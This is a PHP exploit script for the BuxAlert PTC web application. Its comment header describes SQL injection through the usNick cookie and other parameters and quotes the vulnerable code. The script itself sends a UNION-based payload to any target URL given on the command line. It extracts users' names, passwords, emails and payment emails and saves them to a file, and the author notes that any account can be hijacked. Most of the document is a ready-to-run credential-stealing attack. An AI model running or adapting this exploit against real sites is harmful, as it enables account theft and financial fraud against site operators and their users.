<?
/*
[+] BuxAlert PTC
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] n0p1337@gmail.com
[+] sec4ever.com , 1337s.cc


I.Sql Injection Vuln
/referals.php > Inject in cookiws usNick
usNick=i-Hmx'/*! union all select 1,(select group_concat(username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337


require('config.php');
$lole=$_COOKIE["usNick"];
$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");
mysql_close($con);
while ($row = mysql_fetch_array($tabla)) {

sendsms.php , surf.php , almost all php files are cookies injectable under cookie value usNick

/messenger.php?option=delete&id=1%injecthere%

if ($option=="delete"){
require ('config.php');
    //Todo parece correcto procedemos con la inserccion
    $queryz = "DELETE FROM tb_messenger WHERE id='$id' LIMIT 1";
    mysql_query($queryz) or die(mysql_error());
mysql_close($con);
    echo "<font color=\"#cc0000\"><b>Message has been deleted.</b></font><br><br>";
}


/purchase.php
if (isset($_POST["customer"]))
{
$refset=$_POST["refset"];
require('config.php');
$queryx = mysql_query("SELECT sets FROM tb_buyref WHERE id='1' and refnum='$refset'") or die(mysql_error());


Fuck Injection , it's all abt money anyway :D
You can control ay user via usNick cookie value

*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/bux/\n"; 
exit();
}
echo "[+] Bux Alert Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
		$string = " ".$string;
		$ini = strpos($string,$start);
		if ($ini == 0) return "";
		$ini += strlen($start);
		$len = strpos($string,$end,$ini) - $ini;
		return substr($string,$ini,$len);
}
function faexploit($url){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."referals.php");
curl_setopt($curl,CURLOPT_COOKIE,"usNick=i-Hmx'/*! union all select 1,(select group_concat(0x666172736177797e,username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18*/ and 'faris'='1337");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$kaf=faexploit($argv[1]);
if(preg_match("/farsawy/",$kaf)){
$fadata= kastr($kaf,"<tr><td align='center'>","</td><td align='center'>");
$kdata=str_replace("farsawy~","",$fadata);
$kadata=str_replace(",","",$kdata);
@unlink("result.htm");
$res=fopen("result.htm","w+");
fwrite($res,"| BuxAlert Sql Injection Vuln<br>| Exploited By i-Hmx<br>| sec4ever.com , 1337s.cc<br>-----------------------------------<br><br>User -- Password ---- Email ---- Paying email<br>".$kadata."<br>------------i-Hmx----------");
echo "[-] Result have been written to result.htm\n";
echo "[+] Done";
}
else
{
echo "[-] Not vulnerable";
}
?>